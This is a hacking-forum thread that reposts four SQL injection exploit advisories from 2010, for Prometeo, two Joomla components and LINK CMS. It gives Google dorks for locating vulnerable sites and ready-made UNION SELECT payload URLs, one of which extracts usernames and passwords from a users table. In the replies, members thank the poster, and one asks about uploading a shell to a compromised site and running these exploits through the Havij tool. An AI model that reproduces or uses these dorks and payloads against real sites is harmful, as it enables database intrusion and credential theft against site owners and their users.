thanxxx so much mohammad keep ur job like this

√مملكة ثغرات حقن قواعد البيانات√--Kingdom Of Sql Injection--
Prometeo v1.0.65 SQL Injection Vulnerability

PHP:
                      ****     **    ********   **********                     /**/**   /**   **//////   /////**///                      /**//**  /**  /**             /**                         /** //** /**  /*********      /**                         /**  //**/**  ////////**      /**                         /**   //****         /**      /**                         /**    //***   ********       /**                         //      ///   ////////        //
 
                          =================================                  
Prometeo (vers. 1.0.65)  -SQLi Vulnerability-                          =================================
 
-Vulnerability ID: LD3-Product: Prometeo-Vendor: Prometeo (http://www.infomedia2000.it/prometeo/)-Vulnerability Type: SQL Injection-Status: Unfixed-Risk level: High-Credit: Network Security (http://www.netw0rksecurity.net/)
 
-Vulnerability Details:User can execute arbitrary JavaScript code within the vulnerable application.An attacker can use browser to exploit this vulnerability.
 
-Google Dork: inurl:categoria.php?ID= comune
 
-Example:
http://server/categoria.php?ID=132%20and%201=2%20union%20select%201,concat(nome,0x3a,password),3,4,5,6,7,8,9,10,null,12,13,14,15,16,17%20from%20users--
 
# Netw0rkSecurity.net [2010-08-26]                 

Comments
 
√مملكة ثغرات حقن قواعد البيانات√--Kingdom Of Sql Injection--
Joomla Component (com_remository) SQL Injection Vulnerability

PHP:
############################## ALGERIAN HAX0RZ #############################..
# Exploit Title: [title]
# Date: 24/08/2010
# Author: TopSat13
# Software Link: http://remository.com/downloads/
# Version: 1
# Tested on: [win sp3 os]
# CVE : [if exists]
####
#              oooo[ Software Information ]oooo
# Author: TopSat13
#
# Email: TopSat13@live.fr
#
# Vendor : http://remository.com/
#
# title : Joomla Component (com_remository) SQL Injection Vulnerability
#
# Dork :"inurl:index.php?option=com_remository"
#
####           oooo[ vuln & exploit & Demo ]oooo
#
# vuln: site.com/index.php?option=com_remository&Itemid=[sql]
# or
# vuln: site.com/index.php?option=c&Itemid=183&func=selectcat&cat=[sql]
#
# exploit:
#
# 0nligne demo :
http://www.site.com/portail/index.php?option=com_remository&Itemid=183&func=selectcat&cat=3'
#
#
####          oooo[ Greeeeeeeeeeeeeeeeeeetz ]oooo
#
# to : ALLAH , All my freands , all musulmens hackerz
#
############################## ALGERIAN H4X0RZ
################################..
 
√مملكة ثغرات حقن قواعد البيانات√--Kingdom Of Sql Injection--
Joomla Component (com_zoomportfolio) SQL Injection Vulnerability

PHP:
---------------------------------------------------------------------------------
Joomla Component Zoom Portfolio (id) Remote Sql Injection
---------------------------------------------------------------------------------
 
Author      : Chip D3 Bi0s
Group       : LatinHackTeam
Email & msn : chipdebios@gmail.com
Date        : 23 August 2010
Critical Lvl    : Moderate
Impact      : Exposure of sensitive information
Where       : From Remote
---------------------------------------------------------------------------
 
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
Application : Zoom Portfolio --Joomla Portfolio Component
version     : 1.5
Price       : $20.00
Developer   : EGBZOOM
License     : GPLv2 or later           type  : Commercial
Date Added  : 21 August 2010
Download    : http://www.egbzoom.com/joomla-portfolio-component.html
 
Description     :
 
Zoom Portfolio enables you to display your portfolio in a "directory listing-like
presentation" with minimum effort.The Component has features like add category
add images,settings,add portfolio .Zoom Portfolio includes automatic thumbnail creation,
captioning, searching and more.It also includes the ability to modify and delete any
of your existing pages.
The Zoom Portfolio is an amazing example of what can be done online with your online
presence. It is directed at artists of all walks of life, it is very easy to install
and customize, and it is just simply stunning.
 
-------------------------
 
How to exploit
 
http://127.0.0.1/path/index.php?option=com_zoomportfolio&view=portfolio&view=portfolio&id=[sql]
 
-------------------------
 
+++++++++++++++++++++++++++++++++++++++
[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++
 
√مملكة ثغرات حقن قواعد البيانات√--Kingdom Of Sql Injection--
LINK CMS SQL Injection Vulnerability

PHP:
# Exploit Title: LINK CMS.SQL Injection Vulnerability
# Date: 2010-08-23
# Author: hacker@sr.gov.yu
# Software Link:
http://www.link-softsolutions.com/SoftLink-Content-Management-System---CMS_20_1
# Version: n/a
 
 
####################################################################
.:. Author : hacker@sr.gov.yu
.:. Contact: hacker@evilzone.org, hacker@sr.gov.yu(MSN)
.:. Home : www.evilzone.org, www.pentesting-rs.org
.:. Script : LINK CMS
.:. Bug Type : Sql Injection
.:. Risk: High
.:. Tested on : Windows & Linux
 ####################################################################
 
===[ Exploit ]===
 
.:. It was found that LINK CMS does not validate properly the "IDStranicaPodaci"
parameter value.
 
http://server/navigacija.php?jezik=lat&IDMeniGlavni=6&IDMeniPodSekcija=45&IDMeniPodSekcija3=6&IDStranicaPodaci=63[SQLi]
 
===[ Example ]===
 
http://server/navigacija.php?jezik=lat&IDMeniGlavni=6&IDMeniPodSekcija=45&IDMeniPodSekcija3=6&IDStranicaPodaci=-63
UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4--
 
 
===[ Solution ]===
 
.:. Input validation of "IDStranicaPodaci" parameter should be corrected.
 
 
Greetz to ALL EVILZONE.org && pentesting-rs.org members!!!
Pozdrav za sve iz Srbije!!! :-)))
 

MadaRaXP

New Member
√مملكة ثغرات حقن قواعد البيانات√--Kingdom Of Sql Injection--
perl langugue ?
its need Some Application Yo Run
 

winfil

New Member
√مملكة ثغرات حقن قواعد البيانات√--Kingdom Of Sql Injection--
thnk you so much homie at last i found smth'n more stable .i want to ask you if i can upload my shell when i enter the db & other question can i use ""havij whith those exploits
 
أعلى